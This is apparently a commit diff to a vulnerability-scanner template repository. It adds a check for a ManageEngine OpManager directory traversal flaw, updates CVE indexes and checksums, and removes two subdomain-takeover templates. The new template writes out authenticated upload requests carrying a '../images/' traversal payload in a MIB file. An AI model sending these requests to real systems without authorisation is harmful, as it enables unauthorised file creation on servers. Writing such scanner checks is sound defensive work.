diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml
index f102ab2d4a..9ed1ed1ca0 100644
--- a/.github/workflows/templates-sync.yml
+++ b/.github/workflows/templates-sync.yml
@@ -82,6 +82,7 @@ on:
- 'http/cves/2023/CVE-2023-22527.yaml'
- 'http/cves/2023/CVE-2023-27639.yaml'
- 'http/cves/2023/CVE-2023-27640.yaml'
+ - 'http/cves/2023/CVE-2023-47211.yaml'
- 'http/cves/2023/CVE-2023-48023.yaml'
- 'http/cves/2023/CVE-2023-6023.yaml'
- 'http/cves/2023/CVE-2023-6875.yaml'
diff --git a/.new-additions b/.new-additions
index fac3f0f907..42a9f97703 100644
--- a/.new-additions
+++ b/.new-additions
@@ -77,6 +77,7 @@ http/cves/2018/CVE-2018-10942.yaml
http/cves/2023/CVE-2023-22527.yaml
http/cves/2023/CVE-2023-27639.yaml
http/cves/2023/CVE-2023-27640.yaml
+http/cves/2023/CVE-2023-47211.yaml
http/cves/2023/CVE-2023-48023.yaml
http/cves/2023/CVE-2023-6023.yaml
http/cves/2023/CVE-2023-6875.yaml
diff --git a/cves.json b/cves.json
index 2a49045e15..e6047a15d8 100644
--- a/cves.json
+++ b/cves.json
@@ -2232,6 +2232,7 @@
{"ID":"CVE-2023-46747","Info":{"Name":"F5 BIG-IP - Unauthenticated RCE via AJP Smuggling","Severity":"critical","Description":"CVE-2023-46747 is a critical severity authentication bypass vulnerability in F5 BIG-IP that could allow an unauthenticated attacker to achieve remote code execution (RCE). The vulnerability impacts the BIG-IP Configuration utility, also known as the TMUI, wherein arbitrary requests can bypass authentication. The vulnerability received a CVSSv3 score of 9.8.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-46747.yaml"}
{"ID":"CVE-2023-46805","Info":{"Name":"Ivanti ICS - Authentication Bypass","Severity":"high","Description":"An authentication bypass vulnerability in the web component of Ivanti ICS 9.x, 22.x and Ivanti Policy Secure allows a remote attacker to access restricted resources by bypassing control checks.","Classification":{"CVSSScore":"8.2"}},"file_path":"http/cves/2023/CVE-2023-46805.yaml"}
{"ID":"CVE-2023-4714","Info":{"Name":"PlayTube 3.0.1 - Information Disclosure","Severity":"high","Description":"A vulnerability was found in PlayTube 3.0.1 and classified as problematic. This issue affects some unknown processing of the component Redirect Handler. The manipulation leads to information disclosure. The attack may be initiated remotely.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-4714.yaml"}
+{"ID":"CVE-2023-47211","Info":{"Name":"ManageEngine OpManager - Directory Traversal","Severity":"high","Description":"A directory traversal vulnerability exists in the uploadMib functionality of ManageEngine OpManager 12.7.258. A specially crafted HTTP request can lead to arbitrary file creation. An attacker can send a malicious MiB file to trigger this vulnerability.\n","Classification":{"CVSSScore":"8.6"}},"file_path":"http/cves/2023/CVE-2023-47211.yaml"}
{"ID":"CVE-2023-47246","Info":{"Name":"SysAid Server - Remote Code Execution","Severity":"critical","Description":"In SysAid On-Premise before 23.3.36, a path traversal vulnerability leads to code execution after an attacker writes a file to the Tomcat webroot, as exploited in the wild in November 2023.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-47246.yaml"}
{"ID":"CVE-2023-48023","Info":{"Name":"Anyscale Ray 2.6.3 and 2.8.0 - Server-Side Request Forgery","Severity":"high","Description":"The Ray Dashboard API is affected by a Server-Side Request Forgery (SSRF) vulnerability in the url parameter of the /log_proxy API endpoint. The API does not perform sufficient input validation within the affected parameter and any HTTP or HTTPS URLs are accepted as valid.\n","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2023/CVE-2023-48023.yaml"}
{"ID":"CVE-2023-49070","Info":{"Name":"Apache OFBiz \u003c 18.12.10 - Arbitrary Code Execution","Severity":"critical","Description":"Pre-auth RCE in Apache Ofbiz 18.12.09. It's due to XML-RPC no longer maintained still present. This issue affects Apache OFBiz: before 18.12.10.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-49070.yaml"}
diff --git a/cves.json-checksum.txt b/cves.json-checksum.txt
index 5b2d5c39c4..93e594a985 100644
--- a/cves.json-checksum.txt
+++ b/cves.json-checksum.txt
@@ -1 +1 @@
-05564255e098e325ecbfdfd43751f476
+c95ebe1b9b7034e3fe834994f5aaf6ba
diff --git a/http/cves/2021/CVE-2021-39327.yaml b/http/cves/2021/CVE-2021-39327.yaml
index 5b9d52f88d..f58bee6ef3 100644
--- a/http/cves/2021/CVE-2021-39327.yaml
+++ b/http/cves/2021/CVE-2021-39327.yaml
@@ -45,6 +45,12 @@ http:
- '=================='
condition: and
+ - type: regex
+ negative: true
+ part: body
+ regex:
+ - '^BPS\sDB\sBACKUP\sLOG\r\n==================\r\n==================\r\n\r\n$'
+
- type: word
part: header
words:
@@ -53,4 +59,4 @@ http:
- type: status
status:
- 200
-# digest: 4a0a00473045022100af3dd0939f62b4cb86987680c8af5e298418eb98e823b6fcec9e342d1a27c69e02206c8d9f34d0eedd307ab441de49c36ae76fce1baeae4b5d4e5ce6ba570fba4ca9:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a0048304602210086b49046ea527338562988b0b54d2d60e2df3f6d3e9ec183a2f59cc54041e4ba022100b6cbd53cc294fac59fed7a4386be9d3b13e3cdebfd3eb1c20f4a895e1d8c2484:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-47211.yaml b/http/cves/2023/CVE-2023-47211.yaml
new file mode 100644
index 0000000000..41c54ab4b7
--- /dev/null
+++ b/http/cves/2023/CVE-2023-47211.yaml
@@ -0,0 +1,114 @@
+id: CVE-2023-47211
+
+info:
+ name: ManageEngine OpManager - Directory Traversal
+ author: gy741
+ severity: high
+ description: |
+ A directory traversal vulnerability exists in the uploadMib functionality of ManageEngine OpManager 12.7.258. A specially crafted HTTP request can lead to arbitrary file creation. An attacker can send a malicious MiB file to trigger this vulnerability.
+ reference:
+ - https://talosintelligence.com/vulnerability_reports/TALOS-2023-1851
+ - https://nvd.nist.gov/vuln/detail/CVE-2023-47211
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 8.6
+ cve-id: CVE-2023-47211
+ cwe-id: CWE-22
+ epss-score: 0.000610000
+ epss-percentile: 0.238320000
+ cpe: cpe:2.3:a:zohocorp:manageengine_firewall_analyzer:*:*:*:*:*:*:*:*
+ metadata:
+ max-request: 1
+ shodan-query: http.title:"OpManager Plus"
+ tags: cve,cve2023,zoho,manageengine,authenticated,traversal,lfi
+
+http:
+ - raw:
+ - |
+ POST /two_factor_auth HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ j_username={{username}}&j_password={{password}}
+
+ - |
+ POST /client/api/json/mibbrowser/uploadMib HTTP/1.1
+ Host: {{Hostname}}
+ X-ZCSRF-TOKEN: opmcsrftoken={{x_zcsrf_token}}
+ Content-Type: multipart/form-data; boundary=---------------------------372334936941313273904263503262
+
+ -----------------------------372334936941313273904263503262
+ Content-Disposition: form-data; name="mibFile"; filename="karas.txt"
+ Content-Type: text/plain
+
+ ../images/karas DEFINITIONS ::= BEGIN
+
+
+ IMPORTS
+ enterprises
+ FROM RFC1155-SMI;
+
+ microsoft OBJECT IDENTIFIER ::= { enterprises 311 }
+ software OBJECT IDENTIFIER ::= { microsoft 1 }
+ systems OBJECT IDENTIFIER ::= { software 1 }
+ os OBJECT IDENTIFIER ::= { systems 3 }
+ windowsNT OBJECT IDENTIFIER ::= { os 1 }
+ windows OBJECT IDENTIFIER ::= { os 2 }
+ workstation OBJECT IDENTIFIER ::= { windowsNT 1 }
+ server OBJECT IDENTIFIER ::= { windowsNT 2 }
+ dc OBJECT IDENTIFIER ::= { windowsNT 3 }
+
+ END
+
+ -----------------------------372334936941313273904263503262--
+
+ - |
+ POST /client/api/json/mibbrowser/uploadMib HTTP/1.1
+ Host: {{Hostname}}
+ X-ZCSRF-TOKEN: opmcsrftoken={{x_zcsrf_token}}
+ Content-Type: multipart/form-data; boundary=---------------------------372334936941313273904263503262
+
+ -----------------------------372334936941313273904263503262
+ Content-Disposition: form-data; name="mibFile"; filename="karas.txt"
+ Content-Type: text/plain
+
+ ../images/karas DEFINITIONS ::= BEGIN
+
+
+ IMPORTS
+ enterprises
+ FROM RFC1155-SMI;
+
+ microsoft OBJECT IDENTIFIER ::= { enterprises 311 }
+ software OBJECT IDENTIFIER ::= { microsoft 1 }
+ systems OBJECT IDENTIFIER ::= { software 1 }
+ os OBJECT IDENTIFIER ::= { systems 3 }
+ windowsNT OBJECT IDENTIFIER ::= { os 1 }
+ windows OBJECT IDENTIFIER ::= { os 2 }
+ workstation OBJECT IDENTIFIER ::= { windowsNT 1 }
+ server OBJECT IDENTIFIER ::= { windowsNT 2 }
+ dc OBJECT IDENTIFIER ::= { windowsNT 3 }
+
+ END
+
+ -----------------------------372334936941313273904263503262--
+
+ host-redirects: true
+ max-redirects: 3
+ matchers:
+ - type: dsl
+ dsl:
+ - 'status_code == 200'
+ - 'contains(content_type, "application/json")'
+ - 'contains(body, "MIBFile with same name already exists")'
+ condition: and
+
+ extractors:
+ - type: regex
+ name: x_zcsrf_token
+ group: 1
+ part: header
+ regex:
+ - 'Set-Cookie: opmcsrfcookie=([^;]{50,})'
+ internal: true
+# digest: 4a0a00473045022100d0db16ab8c46ac09c0a481c477c237858642663e12d9ddd8734591713833a2a7022026241af2d76fb1c58e6b80046a5ae5c231df7ac82ce627e4cc345bb039b87a09:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2024/CVE-2024-0204.yaml b/http/cves/2024/CVE-2024-0204.yaml
index beeaead6f6..0b310c786c 100644
--- a/http/cves/2024/CVE-2024-0204.yaml
+++ b/http/cves/2024/CVE-2024-0204.yaml
@@ -19,7 +19,7 @@ info:
metadata:
verified: true
max-request: 1
- shodan-query: http.favicon.hash:1484947000
+ shodan-query: http.favicon.hash:1484947000,1828756398,1170495932 || html:InvalidBrowser.xhtml
tags: cve,cve2024,auth-bypass,goanywhere
http:
@@ -39,4 +39,4 @@ http:
- type: status
status:
- 200
-# digest: 4a0a0047304502200c0737654cbbb14c8e7da4470731e92dace06ddccf481af6ed760cb99c5d75e5022100be491a724570489903e091ba728fa5d7fee4ef4cefd643d1c89ca314edd55f32:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402204cf4124e1cf41e749682dfd2780edee610ad177d8f87b7e5adfaad7e1deaf55602200b1c67b0a6ee6be3e4fc0b8a89ae9672ae6995e4dce26b247f1881f6b4954312:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/takeovers/flywheel-takeover.yaml b/http/takeovers/flywheel-takeover.yaml
deleted file mode 100644
index de53cb511d..0000000000
--- a/http/takeovers/flywheel-takeover.yaml
+++ /dev/null
@@ -1,34 +0,0 @@
-id: flywheel-takeover
-
-info:
- name: Flywheel Subdomain Takeover
- author: smaranchand
- severity: high
- description: Flywheel takeover was detected.
- reference:
- - https://smaranchand.com.np/2021/06/flywheel-subdomain-takeover
- metadata:
- verified: true
- max-request: 1
- shodan-query: http.html:"Flywheel"
- tags: takeover,flywheel
-
-http:
- - method: GET
- path:
- - "{{BaseURL}}"
-
- matchers-condition: or
- matchers:
- - type: word
- part: body
- words:
- - "We're sorry, you've landed on a page that is hosted by Flywheel"
- - "Oops! That's not the site
you're looking for.
"
- condition: and
-
- - type: word
- part: body
- words:
- - "We are sorry, you've landed on a page that is hosted by Flywheel"
-# digest: 4a0a00473045022100c65c64d3a7226e36ae3cf134895cc98fb03a04cdfc9dc431eeb61696a096dd380220464ee36598416ac00838699b717d73b587432b2ed738fe71b2b5da09cc272ab6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/takeovers/webflow-takeover.yaml b/http/takeovers/webflow-takeover.yaml
deleted file mode 100644
index b486fedab0..0000000000
--- a/http/takeovers/webflow-takeover.yaml
+++ /dev/null
@@ -1,32 +0,0 @@
-id: webflow-takeover
-
-info:
- name: webflow takeover detection
- author: pdteam,keni0k
- severity: high
- description: webflow takeover was detected.
- reference:
- - https://github.com/EdOverflow/can-i-take-over-xyz/issues/44
- - https://saurabhsanmane.medium.com/subdomain-takeover-using-webflow-service-5a7b9efcf172
- metadata:
- max-request: 1
- tags: takeover
-
-http:
- - method: GET
- path:
- - "{{BaseURL}}"
-
- matchers-condition: and
- matchers:
- - type: dsl
- dsl:
- - Host != ip
-
- - type: word
- words:
- - "The page you are looking for doesn't exist or has been moved."
- - "The page you are looking for doesn't exist or has been moved"
- - The page you are looking for doesn't exist or has been moved.
- condition: or
-# digest: 490a0046304402206aed9372445d22034b81f846be32bf9c3b3274420a26c29037fd09e1eba21866022034d5c6a742ebe4e8ef4cd8494567c6650f44dfd236288046400e794713646e86:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/templates-checksum.txt b/templates-checksum.txt
index 88b94da714..a28106af09 100644
--- a/templates-checksum.txt
+++ b/templates-checksum.txt
@@ -102,8 +102,8 @@ config/osint.yml:846ae0c6f62f669b094a5e1dd47843fd5ff32395
config/pentest.yml:e3a9ebe543e9c2d046ead1efc292394b54a55196
config/recommended.yml:adcd4e1f0ef7b6b8c57fddbdda3ebf2314a8fa9b
contributors.json:8d840b1db8c1af9a3927448841f817aa9c850de9
-cves.json:ef9364efbde5e7993f18e9b50723f1050dc9d75e
-cves.json-checksum.txt:196f9663089b6233c678f1c7e691bbc39557de82
+cves.json:7be9d972493b1a4c98165486c82e45afbf776118
+cves.json-checksum.txt:24b707d1313a1689aebe90bc748be2aabd5f732b
dns/azure-takeover-detection.yaml:34e8e8a0db3e2ff7af0bf8df8ee9c54f2ee8e3b4
dns/caa-fingerprint.yaml:71845ba0a32b1968e23b507166275ee4c1f84b24
dns/detect-dangling-cname.yaml:0c5204f22465c8ebb8ae31e6265ffa5c0cd4b6e2
@@ -2128,7 +2128,7 @@ http/cves/2021/CVE-2021-39312.yaml:64d165e28ec5a707dc634b224ac54e3104ed2800
http/cves/2021/CVE-2021-39316.yaml:8ca434b922003596d8237b873b11bb21b5518ed8
http/cves/2021/CVE-2021-39320.yaml:ee3b0a1e22774e2a32695553daadc042c88e7fe8
http/cves/2021/CVE-2021-39322.yaml:cd7b1f3f9db49e2190a27a9ae442989fd47161e1
-http/cves/2021/CVE-2021-39327.yaml:8ace5ce89ee650d719d2e75111d1127c4bdc2433
+http/cves/2021/CVE-2021-39327.yaml:82ac7a9c777b6ccbd979552187b525f3e8e2943f
http/cves/2021/CVE-2021-39350.yaml:ffe96a09f03658f9e3c200a4871f11ea1a1f84ef
http/cves/2021/CVE-2021-39433.yaml:07e2f35b5d4dda5a3b884a39e5d2cbba43f41a24
http/cves/2021/CVE-2021-39501.yaml:71ed3e4cb94325f5aa287d47a82e9ec44a3f7791
@@ -2988,6 +2988,7 @@ http/cves/2023/CVE-2023-46574.yaml:d39bb36ad3ad2ca72034abe7139d9ecb3d131bb6
http/cves/2023/CVE-2023-46747.yaml:87070639881b268dd3e220d7d259dd90733c65f5
http/cves/2023/CVE-2023-46805.yaml:f1bdb094c431bd1128a3630f865050617fc62016
http/cves/2023/CVE-2023-4714.yaml:da97fe934a7bced5b02a8cad6acb4222a7b41905
+http/cves/2023/CVE-2023-47211.yaml:83094654f4cad6c39d23fcfe372cf55a05a349a5
http/cves/2023/CVE-2023-47246.yaml:0cbbf14af567525b94bb41bc6be327c666ce44ba
http/cves/2023/CVE-2023-48023.yaml:232bb9e1cb23b2c52849c96f58bcc856c3422bed
http/cves/2023/CVE-2023-49070.yaml:bc09f7344ea3ebf3d441c41d708a7edca91c2dd2
@@ -3016,7 +3017,7 @@ http/cves/2023/CVE-2023-6623.yaml:62b2101ac20cbd8e8d951d835db41ebc8167e217
http/cves/2023/CVE-2023-6634.yaml:2c1b9d81bc80a75902686df1405ff1de1336538d
http/cves/2023/CVE-2023-6875.yaml:f867e6ef03e3266d1cec3d9ced107c917f76a98a
http/cves/2023/CVE-2023-7028.yaml:1372fe3d2ddf8e3cd3960bcd60cbc6e4d438eb81
-http/cves/2024/CVE-2024-0204.yaml:2868f41485c7f25ece52717011b0ca726e322efd
+http/cves/2024/CVE-2024-0204.yaml:a496161a6425754e7ee8cd623d473709f3862912
http/cves/2024/CVE-2024-0352.yaml:6a6fc846f6b5486d7e76f66a3bbd8f367d52f077
http/cves/2024/CVE-2024-21887.yaml:ba5ec455781639fc9679d3a6b37ba784f87918fe
http/default-logins/3com/3com-nj2000-default-login.yaml:3c260ca4c2ee7809221fc4b9330a540795c081ce
@@ -5087,7 +5088,7 @@ http/misconfiguration/mingyu-xmlrpc-sock-adduser.yaml:d680c0d1f329ae9d5f114cf4ac
http/misconfiguration/misconfigured-concrete5.yaml:d56475cb0edd78cf18150ac40eba183c0a201d7d
http/misconfiguration/misconfigured-docker.yaml:f69b164e183b7c668ba054389e77c6aa3cc25fb6
http/misconfiguration/missing-sri.yaml:1bc66d65f6b661a47fc8925571630064bbcd8e40
-http/misconfiguration/mixed-active-content.yaml:dfcfc0e7e3a735db753079828af5251165b01c53
+http/misconfiguration/mixed-active-content.yaml:1a958c89b06668be58457e142802ce450ec76e33
http/misconfiguration/mixed-passive-content.yaml:58ad91895597b997aadc184d4489f699e8b886dc
http/misconfiguration/mlflow-unauth.yaml:b4493ff237b1e91ad2445c6d48b5908294501c08
http/misconfiguration/mobiproxy-dashboard.yaml:4d76a953ef877f0847e2722091d679b905023cc8
@@ -5948,7 +5949,6 @@ http/takeovers/cargo-takeover.yaml:42db7ee4771a5cbddc6e2b8072070c583d6fd452
http/takeovers/cargocollective-takeover.yaml:dde78512f960c62936577c19801b1446ec65d5d3
http/takeovers/clever-takeover.yaml:f4d45f5b42f376d3258d2b4140a9dad14e25cd87
http/takeovers/flexbe-takeover.yaml:beb769a298f11ffc28a49fbdc3f9e15c4d22a181
-http/takeovers/flywheel-takeover.yaml:61d2bc14e417d1dca72d6c392f1e8df707b28300
http/takeovers/frontify-takeover.yaml:e7700c7ad9bb5a761d8bd1395c6a5360c91b3dcb
http/takeovers/gemfury-takeover.yaml:69d22f9c935be01d0ebad5946a9766eafe12fc68
http/takeovers/getresponse-takeover.yaml:5eff48c5b7d27eeede3d2e7fba1a8a6f314fa9bd
@@ -5996,7 +5996,6 @@ http/takeovers/uptimerobot-takeover.yaml:491f4c81a2351d275943abe78437d45010346ef
http/takeovers/uservoice-takeover.yaml:cfd1730b418655f4ef16ce1fd29ac406af3ac472
http/takeovers/vend-takeover.yaml:61af84b5ce0e9de0f9657e64c793e8c1f22110c6
http/takeovers/vercel-takeover.yaml:881400eef9e2d67febebc5bbb0ae8e8d40d190dd
-http/takeovers/webflow-takeover.yaml:04ee1fc244dea4b56e52a51b8833f3067055eccc
http/takeovers/wishpond-takeover.yaml:59ed0bc6dabc39d9915c45bea80c75ad96ee00c3
http/takeovers/wix-takeover.yaml:d3f8931c10d51d15a048f8ccd9c603b5f5164b5d
http/takeovers/wordpress-takeover.yaml:6943a0158783833fd1797e7500e985be38acaefd
@@ -7857,7 +7856,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a
ssl/untrusted-root-certificate.yaml:f6a60c9b6234a281d22af2436c44dac52ccac831
ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89
ssl/wildcard-tls.yaml:eac3197b9e6ec0342dff2ef774c6785c852868b4
-templates-checksum.txt:d3136794c21df11cec97d887307db544b7c476c5
+templates-checksum.txt:a230836ff778691b2388b8d6ffbe76b64a0e7985
wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1
workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0
workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4